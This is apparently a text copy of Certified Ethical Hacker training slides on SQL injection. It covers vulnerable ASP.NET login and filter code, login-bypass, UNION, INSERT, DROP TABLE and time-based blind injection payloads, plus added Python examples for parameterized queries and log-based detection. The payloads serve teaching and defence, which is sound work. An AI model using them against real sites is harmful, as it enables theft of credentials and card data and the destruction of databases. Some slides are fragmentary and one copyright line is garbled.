Học viện Công Nghệ Thông Tin Bach Khoa
Page 1
Module 14: SQL Injection
Engineered by Hackers. Presented by Professionals.
Certified Ethical Hacker
Page 3
Module Objectives
- SQL Injection
- SQL Injection Attacks
- SQL Injection Detection
- Password Grabbing
- Evasion Techniques
- How to Defend Against SQL Injection
Page 5
SQL Injection
SQL Injection is the most common website vulnerability on the Internet.
It is a flaw in web applications and not a database or web server issue.
Most programmers are still not aware of this threat.
Page 6
... the biggest identity theft case ever prosecuted ... sniffer software on the companies' servers to intercept credit ...
Page 7
Page 8
- Spoofing identity
- Changing price
- ... on the server
- ... of data
Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.
Page 9
SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database.
SQL injection is a basic attack used either to gain unauthorized access to a database or to retrieve information directly from the database.
Page 10
On the basis of the application used and the way it processes user-supplied data, SQL injection can be used to implement the attacks mentioned below:
- An attacker logs onto an application and gains administrative privileges.
- An attacker compromises the host OS.
- An attacker obtains sensitive information that is stored in the database.
- Attackers use this attack to delete web pages, insert malicious content into the database, or alter the contents of the database.
- Attackers use this attack to delete the database information, or to delete log or audit information that is stored in a database.
Page 12
Powerful server-side technologies like ASP.NET and database servers allow developers to ...
The power of ASP.NET and SQL can easily be exploited using SQL injection attacks.
All relational databases, including SQL Server, Oracle, IBM DB2, and MySQL, are susceptible to SQL injection attacks.
SQL injection attacks do not exploit a specific software vulnerability; instead they exploit code that does not follow safe practices for accessing and manipulating data stored in a relational database.
Page 13
When a user provides information and clicks Submit, the browser submits a string to the web server that contains the user's credentials:

    <form action=/cgi-bin/login method=post>
    Username: <input type=text name=username>
    Password: <input type=password name=password>
    </form>

This string is visible in the body of the HTTP or ... request.
SQL query at the database: ...
Page 14
Example 1: Normal SQL Query
http://juggyboy.com/BadLogin.aspx (BadLogin.aspx.cs, JuggyBoy.com)

Server-side Code (BadLogin.aspx):

    private void cmdLogin_Click(object sender, System.EventArgs e) {
        string strCnx = "server=localhost;database=northwind;uid=sa;pwd=;";
        SqlConnection cnx = new SqlConnection(strCnx);
        cnx.Open();
        //This code is susceptible to SQL injection attacks.
        string strQry = "SELECT Count(*) FROM Users WHERE UserName='" + txtUser.Text +
            "' AND Password='" + txtPassword.Text + "'";
        int intRecs;
        SqlCommand cmd = new SqlCommand(strQry, cnx);
        intRecs = (int) cmd.ExecuteScalar();
        // a count greater than zero is treated as a successful login
        cnx.Close();
    }

Query sent to the database for a normal login:

    SELECT Count(*) FROM Users WHERE UserName='...' AND Password='...'
Page 15
Code after -- is now a comment.
Page 16
The user is then authenticated and redirected to the requested page.

    SELECT Count(*) FROM Users WHERE UserName='blah' Or 1=1 --' AND Password=''

Because a pair of hyphens designates the beginning of a comment in SQL, the query simply becomes:

    SELECT Count(*) FROM Users WHERE UserName='blah' Or 1=1
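To make the login check on these pages runnable, here is an added example (not code from the slides or from EC-Council) that rebuilds the BadLogin.aspx query in Python over an in-memory SQLite database and places the string-concatenated query beside a parameterized one. The Users table, its columns and the two sample accounts are constructed for the demonstration; the injected username is the one shown on the slide.

```python
import sqlite3

# Constructed sample accounts standing in for the Users table that BadLogin.aspx queries.
SAMPLE_USERS = [("admin", "s3cret-admin"), ("alice", "wonderland")]


def setup_db():
    """In-memory SQLite database with a Users table shaped like the one on the slide."""
    cnx = sqlite3.connect(":memory:")
    cnx.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    cnx.executemany("INSERT INTO Users VALUES (?, ?)", SAMPLE_USERS)
    return cnx


def count_matches_concatenated(cnx, username, password):
    """Mirror of the slide's strQry: the submitted values become part of the SQL text.
    Returns (row count, the SQL text the database actually parsed)."""
    qry = ("SELECT Count(*) FROM Users WHERE UserName='" + username
           + "' AND Password='" + password + "'")
    return cnx.execute(qry).fetchone()[0], qry


def count_matches_parameterized(cnx, username, password):
    """Hardened form: the SQL text is constant; the values travel separately as bound parameters."""
    qry = "SELECT Count(*) FROM Users WHERE UserName=? AND Password=?"
    return cnx.execute(qry, (username, password)).fetchone()[0], qry


def login_outcomes(username, password):
    """Run one login attempt through both query builders; a count > 0 would log the user in."""
    cnx = setup_db()
    try:
        concat_count, concat_sql = count_matches_concatenated(cnx, username, password)
        param_count, _ = count_matches_parameterized(cnx, username, password)
    finally:
        cnx.close()
    return {"concatenated": concat_count,
            "parameterized": param_count,
            "sql_seen_by_db": concat_sql}


if __name__ == "__main__":
    for user, pw in [("alice", "wonderland"), ("alice", "guess"), ("blah' Or 1=1 --", "")]:
        print(repr(user), login_outcomes(user, pw))
```

With the slide's input the concatenated query counts every row (the `--` turns the password clause into a comment), while the parameterized query looks for a user literally named `blah' Or 1=1 --` and counts nothing: the input can no longer change the structure of the statement, only the value compared.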
Copyright © by E©-Gemmcil All Rights Reserved Reproduction is Strictly Prohibited
Page 17
This page displays products from the Northwind database and allows users to filter the resulting list of products using a textbox called txtFilter. Like the previous example, this code is vulnerable to SQL injection attacks: the executed SQL is constructed dynamically from a user-supplied input.

    private void cmdFilter_Click(object sender, System.EventArgs e) {
        dgrProducts.CurrentPageIndex = 0;
        bindDataGrid();
    }

    private void bindDataGrid() {
        dgrProducts.DataSource = createDataView();
        dgrProducts.DataBind();
    }

    private DataView createDataView() {
        string strCnx = "server=localhost;uid=sa;pwd=;database=northwind;";
        string strSQL = "SELECT ProductId, ProductName, " +
            "QuantityPerUnit, UnitPrice FROM Products";
        //This code is susceptible to SQL injection attacks.
        if (txtFilter.Text.Length > 0) {
            strSQL += " WHERE ProductName LIKE '" + txtFilter.Text + "'";
        }
        SqlConnection cnx = new SqlConnection(strCnx);
        SqlDataAdapter sda = new SqlDataAdapter(strSQL, cnx);
        DataTable dtProducts = new DataTable();
        sda.Fill(dtProducts);
        return dtProducts.DefaultView;
    }
Page 18
[Screenshot: the product filter textbox containing the injected string; user names and passwords are displayed in the product grid]
SQL Query Executed:

    SELECT ProductId, ProductName, QuantityPerUnit, UnitPrice FROM Products WHERE
    ProductName LIKE 'blah' UNION Select 0, username, password, 0 from users
Page 19
[Screenshot: attacker launching SQL injection against a password-recovery form on an SQL Injection Vulnerable Website. Field: Email Address. Message: "Your password will be sent to your registered email address".]
Page 20
[Screenshot: the same password-recovery form, with the INSERT statement below entered in the Email Address field]
SQL Query Executed:

    SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM members
    WHERE email = 'blah'; INSERT INTO jb-customers ('jb-email','jb-passwd','jb-login_id','jb-last_name')
    VALUES ('jason@springfield.com','hello','jason','jason springfield');--';
Page 21

    SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM table WHERE jb-email = '...
Page 22
[Screenshot: attacker launching SQL injection against the password-recovery form. Field: Email Address. Message: "Your password will be sent to your registered email address".]
Page 24
Step 1: Check if the web application connects to a Database Server in order to access some data.
Step 2: ...
Step 3: Attempt to inject codes into the input fields to generate an error.
Step 4: Try to insert a string value where a number is expected in the input field.
Step 5: The UNION operator is used to combine the result-set of two or more SELECT statements.
Step 6: Detailed error messages provide a wealth of information to an attacker in order to execute SQL injection.
Page 25
Attempt to inject codes into the input fields to generate an error: semicolons (;), comments (--), AND, and OR.

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the ...

Try to insert a string value where a number is expected in the input field.

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the ... to a column of data type int
    /visa/credit.aspx
Page 26
Symbol                        Meaning
+                             Addition, concatenate (or space in URL)
||                            (Double pipe) concatenate
%                             Wildcard attribute indicator
?Param1=foo&Param2=bar        URL parameters
                              Useful as non-transactional command
@variable                     Local variable
@@variable                    Global variable
waitfor delay '0:0:10'        Time delay
@@version                     Displays SQL Server version
Page 27
Method 1: Function Testing. This testing falls within the scope of black box testing, and as such, should require no ...
Method 2: inputting massive amounts of random data and observing the changes in the output.
Method 3: Static/Dynamic Testing.
Example requests: http://juggyboy/?parameter=123 and http://juggyboy/?parameter=1
Page 28
- Send single quotes as the input data to catch instances where the user input is not sanitized.
- Send double quotes as the input data to catch instances where the user input is not sanitized.
- Use the right square bracket (the ] character) as the input data to catch instances where the user input is used as part of a SQL identifier without any input sanitization.
- Send long strings of single quote characters (or right square brackets or double quotes). These max out the return values from the REPLACE and QUOTENAME functions and might truncate the command variable used to hold the SQL statement.
- Send long strings of junk data, just as you would send strings to detect buffer overruns; this action might throw SQL errors on the page.
Page 29
Testing for SQL Injection
Testing String:
    1' or '1'='1
    value' or '1'='2
    1' and '1'='2
    1' or 'ab'='a'+'b
    1' or 'ab'='a'||'b
Variations:
    '; [SQL Statement]; --
    '; [SQL Statement]; #
    [SQL Statement]; --
    [SQL Statement]; #
Testing String:
    '; drop table users --
Testing String:
    admin' #
Page 30
Testing for SQL Injection
    ' union select * from users where login ...
    'some'+'thing'
    ' OR 'something' like 'some%'
    ' OR 'whatever' in ('whatever')
    ' OR 2 BETWEEN 1 and 3
    ' or username like char(37);
    '; EXEC ('SEL' + 'ECT ...
    +or+isnull%281%2F0%29+%2F*
    '; drop table temp
Page 33
System Stored Procedure: attackers exploit databases' stored procedures to perpetrate their attacks.
The "UNION SELECT" statement returns the union of the intended dataset with the target dataset:

    SELECT Name, Phone, Address FROM Users WHERE Id=1
    UNION SELECT creditCardNumber,1,1 FROM CreditCardTable

After injecting code into a particular field, legitimate code that follows is nullified through usage of end-of-line comments.
An attacker may gain knowledge by injecting illegal/logically incorrect requests, learning injectable parameters, data types, names of tables, etc. from the resulting errors.
Injecting statements that are always true, so that queries always return results upon evaluation of the WHERE condition.
Page 34
Union SQL Injection - Extract Database Name
    http://juggyboy.com/page.aspx?id=...
    [DB_NAME] Returned from the server
Union SQL Injection - Extract Database Tables
    http://juggyboy.com/page.aspx?id=...
    [EMPLOYEE_TABLE] Returned from the server
Union SQL Injection - Extract 1st Field Data
    http://juggyboy.com/page.aspx?id=...
    [FIELD 1 VALUE] Returned from the server
Page 35
SQL Injection Error Based
Extract Database Name
    Syntax error converting the nvarchar value '[DB NAME]' to a column of data type int
Extract 1st Database Table
    Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int
Extract 1st Table Column Name
    Syntax error converting the nvarchar value '[COLUMN NAME 1]' to a column of data type int
Extract 1st Field of 1st Row (Data)
    Syntax error converting the nvarchar value '[FIELD 1 VALUE]' to a column of data type int
Page 37
Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker.
Blind SQL injection is identical to a normal SQL Injection except that when an attacker attempts to exploit an application, rather than seeing a useful error message, a generic custom page is displayed.
This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.
Page 38

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the ...
Page 39
WAITFOR DELAY 'time' (seconds)
This is just like sleep: it waits for the specified time. It is a CPU-safe way to make the database wait.
Generic page returned to the user: "We are unable to process your request. Please try back later."
Page 40

    /?id=1+AND+555=if(ord(mid((select+pass+from+users+limit+0,1),1,1))=97,555,777)

Searching for the first character of the first password (letter "a"), then searching for the second character ...
Page 41
Check for username length:

    http://juggyboy.com/page.aspx?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'
    http://juggyboy.com/page.aspx?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'
    http://juggyboy.com/page.aspx?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'

Check if the 1st character in the username is 'A' (a=97), 'B' (b=98), or 'C' (c=99), etc.:

    http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'
    http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'
    http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'

Check if the 2nd character in the username is 'A' (a=97), 'B', or 'C', etc.:

    http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))=97) WAITFOR DELAY '00:00:10'
    http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'
    http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))=99) WAITFOR DELAY '00:00:10'

Check the 3rd character in the same way:

    http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))=97) WAITFOR DELAY '00:00:10'
    http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))=98) WAITFOR DELAY '00:00:10'
    http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))=99) WAITFOR DELAY '00:00:10'
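From the defender's side, the requests on pages 40 and 41 leave a recognisable trail in the web server log: many near-identical requests from one source whose query strings carry WAITFOR DELAY, ASCII/substring character probes, stacked statements or subselects, one request per character or bit recovered. The following added example (not part of the slides) parses constructed Apache-style access log lines, flags the indicators the slides describe, and counts flagged requests per source address. The log format, the sample lines and the indicator set are assumptions for the demonstration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache-style access log lines (not taken from the slides). Lines 2-4 carry
# the blind injection probes shown on pages 40 and 41; lines 1 and 5 are ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /page.aspx?id=1 HTTP/1.1" 200 5123
10.0.0.7 - - [10/Oct/2023:13:55:40 +0000] "GET /page.aspx?id=1;+IF+(LEN(USER)=1)+WAITFOR+DELAY+'00:00:10'-- HTTP/1.1" 200 5123
10.0.0.7 - - [10/Oct/2023:13:55:51 +0000] "GET /page.aspx?id=1;+IF+(ASCII(lower(substring((USER),1,1)))=97)+WAITFOR+DELAY+'00:00:10'-- HTTP/1.1" 200 5123
10.0.0.9 - - [10/Oct/2023:13:56:02 +0000] "GET /?id=1+AND+555=if(ord(mid((select+pass+from+users+limit+0,1),1,1))=97,555,777) HTTP/1.1" 200 4870
10.0.0.3 - - [10/Oct/2023:13:56:10 +0000] "POST /BadLogin.aspx HTTP/1.1" 302 120
"""

# Common log format: ip ident user [timestamp] "method target protocol" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Indicator patterns for the techniques the slides show, applied to the decoded query string.
INDICATORS = {
    "time_delay": re.compile(r"\bwaitfor\s+delay\b|\bsleep\s*\(|\bbenchmark\s*\(", re.I),
    "char_probe": re.compile(r"\b(ascii|ord)\s*\(\s*(lower\s*\()?\s*(substring|mid)\s*\(", re.I),
    "union_select": re.compile(r"\bunion\b.{0,20}\bselect\b", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
    "comment_terminator": re.compile(r"--|/\*"),
    "stacked_statement": re.compile(r";\s*(if|exec|insert|update|delete|drop|waitfor)\b", re.I),
}


def parse_line(line):
    """Split one access-log line into ip, path, decoded query string and status; None if unparseable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    path, _, query = m.group("target").partition("?")
    return {"ip": m.group("ip"), "path": path,
            "query": unquote_plus(query), "status": int(m.group("status"))}


def classify(query):
    """Names of every indicator that fires on a decoded query string."""
    return [name for name, rx in INDICATORS.items() if rx.search(query)]


def scan_log(text):
    """Return (ip, path, indicators) for each request whose query string trips at least one indicator."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["query"]:
            continue
        hits = classify(rec["query"])
        if hits:
            findings.append((rec["ip"], rec["path"], hits))
    return findings


def suspicious_sources(findings, threshold=2):
    """Sources with at least `threshold` flagged requests; blind injection needs one request per bit or character."""
    counts = Counter(ip for ip, _, _ in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip, path, hits in found:
        print(ip, path, ", ".join(hits))
    print("repeat offenders:", suspicious_sources(found))
```

Decoding the query string before matching matters because the probes arrive with `+` for spaces and percent-encoded punctuation; the per-source count is the signal that separates a single stray quote from the hundreds of timed requests a character-by-character extraction needs.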